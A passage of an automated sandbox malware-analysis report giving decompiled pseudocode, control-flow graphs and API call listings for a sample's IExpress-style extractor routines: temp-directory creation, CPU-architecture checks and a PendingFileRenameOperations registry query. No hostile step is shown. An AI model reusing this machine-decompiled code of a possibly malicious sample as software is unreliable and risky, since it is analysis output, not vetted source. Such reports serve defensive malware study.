                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            • API String ID: 1082909758-4044985724
                                                                                                                                                                                                                                            • Opcode ID: d15256fd5172a764b7ce0f81a653c2d62f3e3c641e2fd0a092bb2f93b367c6c3
                                                                                                                                                                                                                                            • Instruction ID: 1d2b55f8f7c8797c26c67bd9667df758dc5e8124308ce1c6d20ba6623aebf68f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d15256fd5172a764b7ce0f81a653c2d62f3e3c641e2fd0a092bb2f93b367c6c3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC11017130092477D322AB26BC49FEF766DEFD2721F104129F646D2190CEB48A8786A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 522 325467-325484 523 32548a-325490 call 3253a1 522->523 524 32551c-325528 call 321680 522->524 527 325495-325497 523->527 528 32552d-325539 call 3258c8 524->528 529 325581-325583 527->529 530 32549d-3254c0 call 321781 527->530 537 32553b-325545 CreateDirectoryA 528->537 538 32554d-325552 528->538 532 32558d-32559d call 326ce0 529->532 541 3254c2-3254d8 GetSystemInfo 530->541 542 32550c-32551a call 32658a 530->542 544 325577-32557c call 326285 537->544 545 325547 537->545 539 325554-325557 call 32597d 538->539 540 325585-32558b 538->540 551 32555c-32555e 539->551 540->532 549 3254da-3254dd 541->549 550 3254fe 541->550 542->528 544->529 545->538 555 3254f7-3254fc 549->555 556 3254df-3254e2 549->556 552 325503-325507 call 32658a 550->552 551->540 557 325560-325566 551->557 552->542 555->552 559 3254f0-3254f5 556->559 560 3254e4-3254e7 556->560 557->529 561 325568-325575 RemoveDirectoryA 557->561 559->552 560->542 562 3254e9-3254ee 560->562 561->529 562->552
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00325467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t10 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                                            					_t48 = 0x3291e4;
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E00321680(0x3291e4, 0x104);
                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                            					_t13 = E003258C8(_t48); // executed
                                                                                                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						_t42 = _a4;
                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							 *0x329124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                            							return E00326CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t16 = E0032597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                            						if(_t16 != 0) {
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t61 =  *0x328a20; // 0x0
                                                                                                                                                                                                                                            						if(_t61 != 0) {
                                                                                                                                                                                                                                            							 *0x328a20 = 0;
                                                                                                                                                                                                                                            							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                            						 *0x329124 = E00326285();
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x328a20 = 1;
                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 =  &_v268;
                                                                                                                                                                                                                                            				_t20 = E003253A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t48 = 0x3291e4;
                                                                                                                                                                                                                                            				E00321781(0x3291e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                            				if(( *0x329a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E0032658A(_t48, 0x104, 0x321140);
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                            				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					_push("i386");
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					E0032658A(_t48, 0x104);
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = _t26 - 1;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					_push("mips");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = _t28 - 1;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					_push("alpha");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t29 != 1) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push("ppc");
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            0x00325472
                                                                                                                                                                                                                                            0x00325479
                                                                                                                                                                                                                                            0x00325481
                                                                                                                                                                                                                                            0x00325484
                                                                                                                                                                                                                                            0x0032551c
                                                                                                                                                                                                                                            0x00325521
                                                                                                                                                                                                                                            0x00325528
                                                                                                                                                                                                                                            0x0032552d
                                                                                                                                                                                                                                            0x0032552f
                                                                                                                                                                                                                                            0x00325539
                                                                                                                                                                                                                                            0x0032554d
                                                                                                                                                                                                                                            0x0032554d
                                                                                                                                                                                                                                            0x00325552
                                                                                                                                                                                                                                            0x00325585
                                                                                                                                                                                                                                            0x00325585
                                                                                                                                                                                                                                            0x0032558b
                                                                                                                                                                                                                                            0x0032558d
                                                                                                                                                                                                                                            0x0032559d
                                                                                                                                                                                                                                            0x0032559d
                                                                                                                                                                                                                                            0x00325557
                                                                                                                                                                                                                                            0x0032555e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325560
                                                                                                                                                                                                                                            0x00325566
                                                                                                                                                                                                                                            0x00325569
                                                                                                                                                                                                                                            0x0032556f
                                                                                                                                                                                                                                            0x0032556f
                                                                                                                                                                                                                                            0x00325581
                                                                                                                                                                                                                                            0x00325581
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325581
                                                                                                                                                                                                                                            0x00325545
                                                                                                                                                                                                                                            0x0032557c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032557c
                                                                                                                                                                                                                                            0x00325547
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325547
                                                                                                                                                                                                                                            0x0032548a
                                                                                                                                                                                                                                            0x00325490
                                                                                                                                                                                                                                            0x00325497
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032549d
                                                                                                                                                                                                                                            0x003254ab
                                                                                                                                                                                                                                            0x003254b4
                                                                                                                                                                                                                                            0x003254c0
                                                                                                                                                                                                                                            0x0032550c
                                                                                                                                                                                                                                            0x00325511
                                                                                                                                                                                                                                            0x00325515
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325515
                                                                                                                                                                                                                                            0x003254c9
                                                                                                                                                                                                                                            0x003254d6
                                                                                                                                                                                                                                            0x003254d8
                                                                                                                                                                                                                                            0x003254fe
                                                                                                                                                                                                                                            0x00325503
                                                                                                                                                                                                                                            0x00325507
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325507
                                                                                                                                                                                                                                            0x003254da
                                                                                                                                                                                                                                            0x003254dd
                                                                                                                                                                                                                                            0x003254f7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003254f7
                                                                                                                                                                                                                                            0x003254df
                                                                                                                                                                                                                                            0x003254e2
                                                                                                                                                                                                                                            0x003254f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003254f0
                                                                                                                                                                                                                                            0x003254e7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003254e9
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003254C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032553D
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032556F
                                                                                                                                                                                                                                              • Part of subcall function 003253A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003253FB
                                                                                                                                                                                                                                              • Part of subcall function 003253A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325402
                                                                                                                                                                                                                                              • Part of subcall function 003253A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032541F
                                                                                                                                                                                                                                              • Part of subcall function 003253A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032542B
                                                                                                                                                                                                                                              • Part of subcall function 003253A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-3963195772
                                                                                                                                                                                                                                            • Opcode ID: da4e7a9a9b96bcefaea3d29d1a57a24692788655d3fce6412fd1506dfe21fb74
                                                                                                                                                                                                                                            • Instruction ID: 70170d6c7327dd122d9004dce9a86dde3a45494227d05953d8090a9007cdf9d0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da4e7a9a9b96bcefaea3d29d1a57a24692788655d3fce6412fd1506dfe21fb74
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24310871B00A345BCB23AB2ABD45A7E779FAB96300F25412AE907C6544DF708F428695
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 563 32256d-32257d 564 322622-322627 call 3224e0 563->564 565 322583-322589 563->565 570 322629-32262f 564->570 566 32258b 565->566 567 3225e8-322607 RegOpenKeyExA 565->567 569 322591-322595 566->569 566->570 571 3225e3-3225e6 567->571 572 322609-322620 RegQueryInfoKeyA 567->572 569->570 574 32259b-3225ba RegOpenKeyExA 569->574 571->570 575 3225d1-3225dd RegCloseKey 572->575 574->571 576 3225bc-3225cb RegQueryValueExA 574->576 575->571 576->575
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E0032256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E003224E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00322572
                                                                                                                                                                                                                                            0x00322573
                                                                                                                                                                                                                                            0x00322575
                                                                                                                                                                                                                                            0x00322578
                                                                                                                                                                                                                                            0x0032257d
                                                                                                                                                                                                                                            0x00322627
                                                                                                                                                                                                                                            0x00322583
                                                                                                                                                                                                                                            0x00322586
                                                                                                                                                                                                                                            0x00322589
                                                                                                                                                                                                                                            0x003225eb
                                                                                                                                                                                                                                            0x00322607
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322609
                                                                                                                                                                                                                                            0x0032261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032258b
                                                                                                                                                                                                                                            0x0032258b
                                                                                                                                                                                                                                            0x0032259e
                                                                                                                                                                                                                                            0x003225b2
                                                                                                                                                                                                                                            0x003225ba
                                                                                                                                                                                                                                            0x003225cb
                                                                                                                                                                                                                                            0x003225d1
                                                                                                                                                                                                                                            0x003225d6
                                                                                                                                                                                                                                            0x003225da
                                                                                                                                                                                                                                            0x003225dd
                                                                                                                                                                                                                                            0x003225dd
                                                                                                                                                                                                                                            0x003225e3
                                                                                                                                                                                                                                            0x003225e3
                                                                                                                                                                                                                                            0x003225e3
                                                                                                                                                                                                                                            0x0032258b
                                                                                                                                                                                                                                            0x00322589
                                                                                                                                                                                                                                            0x0032262f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00324096,00324096,?,00321ED3,00000001,00000000,?,?,00324137,?), ref: 003225B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00324096,?,00321ED3,00000001,00000000,?,?,00324137,?,00324096), ref: 003225CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00321ED3,00000001,00000000,?,?,00324137,?,00324096), ref: 003225DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00324096,00324096,?,00321ED3,00000001,00000000,?,?,00324137,?), ref: 003225FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00324096,00000000,00000000,00000000,00000000,?,00321ED3,00000001,00000000), ref: 0032261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003225F5
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 003225C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 003225A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: e09b0a93756418633afc42930dd69f115fa61c9c1259ed7c67102ba16e68492f
                                                                                                                                                                                                                                            • Instruction ID: 3ac3a4d7f2657dc313f4ca4f5330d50932c782e0b7eb7ef58d4a276ba8122ac1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e09b0a93756418633afc42930dd69f115fa61c9c1259ed7c67102ba16e68492f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72115135942238BB9B329B92AC09DFBBF7CEF057A1F108155F808E2010D6745E45E6E1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 577 326a60-326a91 call 327155 call 327208 GetStartupInfoW 583 326a93-326aa2 577->583 584 326aa4-326aa6 583->584 585 326abc-326abe 583->585 586 326aa8-326aad 584->586 587 326aaf-326aba Sleep 584->587 588 326abf-326ac5 585->588 586->588 587->583 589 326ad1-326ad7 588->589 590 326ac7-326acf _amsg_exit 588->590 592 326b05 589->592 593 326ad9-326ae9 call 326c3f 589->593 591 326b0b-326b11 590->591 594 326b13-326b24 _initterm 591->594 595 326b2e-326b30 591->595 592->591 599 326aee-326af2 593->599 594->595 597 326b32-326b39 595->597 598 326b3b-326b42 595->598 597->598 600 326b67-326b71 598->600 601 326b44-326b51 call 327060 598->601 599->591 602 326af4-326b00 599->602 605 326b74-326b79 600->605 601->600 613 326b53-326b65 601->613 603 326c39-326c3e call 32724d 602->603 608 326bc5-326bc8 605->608 609 326b7b-326b7d 605->609 614 326bd6-326be3 _ismbblead 608->614 615 326bca-326bd3 608->615 610 326b94-326b98 609->610 611 326b7f-326b81 609->611 617 326ba0-326ba2 610->617 618 326b9a-326b9e 610->618 611->608 616 326b83-326b85 611->616 613->600 619 326be5-326be6 614->619 620 326be9-326bed 614->620 615->614 616->610 622 326b87-326b8a 616->622 623 326ba3-326bbc call 322bfb 617->623 618->623 619->620 620->605 621 326c1e-326c25 620->621 626 326c32 621->626 627 326c27-326c2d _cexit 621->627 622->610 625 326b8c-326b92 622->625 623->621 630 326bbe-326bbf exit 623->630 625->616 626->603 627->626 630->608
                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E00327155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0x3272b8);
                                                                                                                                                                                                                                            				E00327208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0x3288b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0x3288b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0x3281e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x3288b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E00326C3F(0x3210b8, 0x3210c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L00326FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0x3288b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_push(0x3210b4);
                                                                                                                                                                                                                                            							_push(0x3210ac);
                                                                                                                                                                                                                                            							L00327202();
                                                                                                                                                                                                                                            							 *0x3288b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0x3288ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0x3288b4;
                                                                                                                                                                                                                                            						if( *0x3288b4 != 0 && E00327060(_t71, 0x3288b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0x3288b4; // 0x0
                                                                                                                                                                                                                                            							 *0x32a288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x74895b9c
